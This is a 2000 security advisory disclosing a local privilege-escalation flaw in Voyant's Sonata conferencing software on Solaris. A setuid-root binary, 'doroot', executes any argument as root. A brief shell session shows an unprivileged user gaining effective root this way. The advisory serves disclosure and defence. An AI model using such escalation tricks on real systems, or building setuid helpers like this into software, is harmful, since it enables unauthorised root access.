More Sonata Conferencing software vulnerabilities.

["Larry W. Cashdollar" <lwc () VAPID DHS ORG>]

                Vulnerability Report #2 For Voyant Technologies Sonata
                                Conferencing product.

                                 Larry W. Cashdollar
                                     Vapid Labs




Date Published: 12/18/2000

Advisory ID: 12182000-02

CVE CAN: None currently assigned.

Title: Sonata doroot command vulnerability.

Class:  Design Error

Remotely Exploitable:  no

Locally Exploitable:  Yes
        
Vulnerability Description:


        The setuid binary doroot does exactly what it says.  It executes its
command line argument as root.  This is really silly and I dont know why it would need to exist.

Vulnerable Packages/Systems: Sonata v3.x on Solaris 2.x.

Vendor notified on: 11/30/2000

Solution/Vendor Information/Workaround:

        The vendor has told us in so many words that the security of the conferencing system is up to the customer.
This will make it pretty difficult to make modifications to our system since it is production and we can't have any 
downtime.
I would contact Voyant anyhow for a solution.  I can not test the affects of removing the setuid bit on our systems 
until later this week.

Credits:

        Larry W. Cashdollar
        http://vapid.betteros.org

Technical Description - Exploit/Concept Code:


$ cd /opt/TK/tk4.1/library/demos
$ id
uid=60001(nobody) gid=60001(nobody)
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
-rwsr-xr-x   1 root     other       6224 Mar 12  1999 doroot

References:

        Sonata product page.
        http://www.voyanttech.com/displaypage.cfm?pid=27&toppid=22

        Vapid Labs.
        http://vapid.betteros.org
        Email: Larry W. Cashdollar <lwc () vapid betteros org>

DISCLAIMER:

The contents of this advisory are copyright (c) 2000 Larry W. Cashdollar and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.


Ver 2.4 11/30/2000